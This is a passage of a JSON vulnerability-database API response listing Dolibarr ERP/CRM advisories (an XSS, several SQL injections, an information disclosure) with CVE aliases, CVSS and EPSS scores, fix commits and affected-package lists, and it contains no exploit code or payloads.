ID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3z
bv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.4"}],"aliases":["CVE-2018-19799","GHSA-ggww-q2gv-m3g4"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zve5-afaq-mkh8"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/60979?format=json","vulnerability_id":"VCID-g2vp-1tvr-w3d3","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nThe test_sql_and_script_inject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes 
but neither onclick nor onscroll, which allows XSS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17971","reference_id":"","reference_type":"","scores":[{"value":"0.00199","scoring_system":"epss","scoring_elements":"0.41909","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17971"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b2feac9d90f2ecfd5916c4d49176ff1a138744c8","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b2feac9d90f2ecfd5916c4d49176ff1a138744c8"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/8000","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/8000"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17971","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17971"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","
is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9
j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17971","GHSA-qjq9-wx5j-jrg6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g2vp-1tvr-w3d3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/58145?format=json","vulnerability_id":"VCID-n1er-wev8-vbbq","summary":"Dolibarr SQL injection vulnerability in comm/multiprix.php\nSQL injection vulnerability in comm/multiprix.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the id 
parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17897","reference_id":"","reference_type":"","scores":[{"value":"0.00342","scoring_system":"epss","scoring_elements":"0.57091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17897"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17897","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-
yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.v
ulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17897","GHSA-9v7m-f3cv-68rw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n1er-wev8-vbbq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55230?format=json","vulnerability_id":"VCID-n85a-q385-b7dk","summary":"Dolibarr SQL injection vulnerability in adherents/subscription/info.php\nSQL injection vulnerability in adherents/subscription/info.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the rowid parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17899","reference_id":"","reference_type":"","scores":[{"value":"0.00342","scoring_system":"epss","scoring_elements":"0.57091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17899"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17899","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system"
:"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17899"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1w
hv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17899","GHSA-7789-v767-37r5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n85a-q385-b7dk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53682?format=json","vulnerability_id":"VCID-r611-nxvd-akf6","summary":"Dolibarr SQL injection vulnerability in fourn/index.php\nSQL injection vulnerability in fourn/index.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the socid 
parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17900","reference_id":"","reference_type":"","scores":[{"value":"0.00342","scoring_system":"epss","scoring_elements":"0.57091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17900"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17900","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17900"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-
yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.v
ulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17900","GHSA-6frc-vfw9-wm27"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r611-nxvd-akf6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/58573?format=json","vulnerability_id":"VCID-uthw-1ze2-3qdc","summary":"Dolibarr sensitive information disclosure\nDolibarr ERP/CRM version 6.0.4 does not block direct requests to *.tpl.php files, which allows remote attackers to obtain sensitive information.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17898","reference_id":"","reference_type":"","scores":[{"value":"0.00258","scoring_system":"epss","scoring_elements":"0.49349","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17898"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/6a62e139604dbbd5729e57df2433b37a5950c35c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""
}],"url":"https://github.com/Dolibarr/dolibarr/commit/6a62e139604dbbd5729e57df2433b37a5950c35c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17898","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17898"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuh
